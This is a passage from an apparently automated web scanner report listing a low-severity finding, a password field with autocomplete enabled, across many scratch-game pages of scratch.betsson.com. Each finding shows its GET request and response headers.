                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.81. https://scratch.betsson.com/en/Slots/Ice-Land

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Ice-Land

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Ice-Land HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:33 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:33 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:33 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:33 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:32 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.82. https://scratch.betsson.com/en/Slots/Legend-Of-Terra

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Legend-Of-Terra

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Legend-Of-Terra HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:25 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:25 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:25 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:25 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:25 GMT
Connection: close
Content-Length: 102678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.83. https://scratch.betsson.com/en/Slots/Monaco-Glamour

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Monaco-Glamour

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Monaco-Glamour HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:25 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:25 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:25 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:25 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:25 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.84. https://scratch.betsson.com/en/Slots/Monte-Carlo

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Monte-Carlo

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Monte-Carlo HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:31 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:31 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:31 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:31 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:34 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.85. https://scratch.betsson.com/en/Slots/Pirates-Paradise

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Pirates-Paradise

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Pirates-Paradise HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:06 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.86. https://scratch.betsson.com/en/Slots/Sakura-Garden

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Sakura-Garden

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Sakura-Garden HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:07 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:06 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.87. https://scratch.betsson.com/en/Slots/Sea-And-Sun

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Sea-And-Sun

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Slots/Sea-And-Sun HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:23 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.88. https://scratch.betsson.com/en/Slots/Sky-Of-Love

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Sky-Of-Love

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Slots/Sky-Of-Love HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:30 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:30 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:30 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:30 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:30 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.89. https://scratch.betsson.com/en/Slots/Triple-Carnival

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Triple-Carnival

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Slots/Triple-Carnival HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:26 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:26 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:25 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.90. https://scratch.betsson.com/en/Slots/Tropical-Fruit

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Tropical-Fruit

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Slots/Tropical-Fruit HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:59 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:59 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:59 GMT
Connection: close
Content-Length: 102690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.91. https://scratch.betsson.com/en/Sports/100m-Champion

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/100m-Champion

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Sports/100m-Champion HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:53 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:53 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:53 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:53 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:53 GMT
Connection: close
Content-Length: 102707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.92. https://scratch.betsson.com/en/Sports/Bowling

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Bowling

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:08 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:08 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:08 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:08 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:08 GMT
Connection: close
Content-Length: 102693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.93. https://scratch.betsson.com/en/Sports/Darts

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Darts

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Sports/Darts HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:24 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:24 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:24 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:23 GMT
Connection: close
Content-Length: 102702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.94. https://scratch.betsson.com/en/Sports/Goal-Kick

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Goal-Kick

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Sports/Goal-Kick HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:39 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:39 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:39 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:39 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:38 GMT
Connection: close
Content-Length: 102702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.95. https://scratch.betsson.com/en/Sports/Gone-Fishing

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Gone-Fishing

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Sports/Gone-Fishing HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:13 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:13 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:13 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:13 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:13 GMT
Connection: close
Content-Length: 102702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.96. https://scratch.betsson.com/en/Sports/Hippodrome

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Hippodrome

Issue detail

The page contains a form with the following action URL:
#fallback-url-for-non-javascript-clients
The form contains the following password field with autocomplete enabled:
tbPassword

Request

GET /en/Sports/Hippodrome HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:15 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:15 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:15 GMT
Connection: close
Content-Length: 102707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
